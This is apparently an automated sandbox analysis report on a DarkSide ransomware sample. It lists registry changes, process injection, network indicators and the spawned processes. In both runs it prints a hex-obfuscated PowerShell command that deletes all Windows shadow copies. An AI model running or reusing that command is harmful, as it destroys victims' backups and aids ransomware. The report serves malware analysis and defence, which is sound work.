Analysis Overview
SHA256
0c15eaa5c8a3d2bf981ad2e5be531fe760932cb4291038051b5a308c6a66e084
Threat Level: Known bad
The file 5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.zip was found to be: Known bad.
Malicious Activity Summary
DarkSide
Modifies extensions of user files
Reads user/profile data of web browsers
Sets desktop wallpaper using registry
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Modifies Control Panel
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2021-11-17 16:09
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2021-11-17 16:09
Reported
2021-11-17 16:12
Platform
win7-en-20211014
Max time kernel
118s
Max time network
118s
Command Line
Signatures
DarkSide
Modifies extensions of user files
Reads user/profile data of web browsers
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\e0659d9c.BMP" | C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\e0659d9c.BMP" | C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Control Panel\Desktop\WallpaperStyle = "10" | C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.e0659d9c | C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.e0659d9c\ = "e0659d9c" | C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\e0659d9c\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\e0659d9c | C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\e0659d9c\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\e0659d9c.ico" | C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1360 wrote to memory of 1656 | N/A | C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1360 wrote to memory of 1656 | N/A | C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1360 wrote to memory of 1656 | N/A | C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1360 wrote to memory of 1656 | N/A | C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe
"C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
Network
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| Hash | Value |
| MD5 | e1109cfb3b63e8242d63fcf292177f24 |
| SHA1 | 182470d69a047ed646adac9320757d58b9566475 |
| SHA256 | 4c8c819324494c14538ec0df9ef24e196d6d6d39e246af794fcf2867b6b93ae4 |
| SHA512 | ccb5ff8e586f9453c6f1e8e33a1a517bbe68a338a8853e393efac41ca72b54ac09e34c944f66674628794682fbae1b2716896054b636cdb8299e140e60f47af1 |
Analysis: behavioral2
Detonation Overview
Submitted
2021-11-17 16:09
Reported
2021-11-17 16:12
Platform
win10-en-20211104
Max time kernel
105s
Max time network
123s
Command Line
Signatures
DarkSide
Modifies extensions of user files
Reads user/profile data of web browsers
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\438d7d9f.BMP" | C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\438d7d9f.BMP" | C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Control Panel\Desktop\WallpaperStyle = "10" | C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.438d7d9f | C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.438d7d9f\ = "438d7d9f" | C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\438d7d9f\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\438d7d9f | C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\438d7d9f\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\438d7d9f.ico" | C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2704 wrote to memory of 2012 | N/A | C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2704 wrote to memory of 2012 | N/A | C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe
"C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
Network
| US | 8.8.8.8:53 | 134.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 139.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 151.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 247.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 243.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 231.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 236.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 250.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 248.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 254.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 207.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 223.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 219.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 253.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 252.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 251.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 246.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 242.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 244.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 239.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 245.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.1.127.10.in-addr.arpa | udp |
| US | 72.52.178.23:443 | catsdegree.com | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive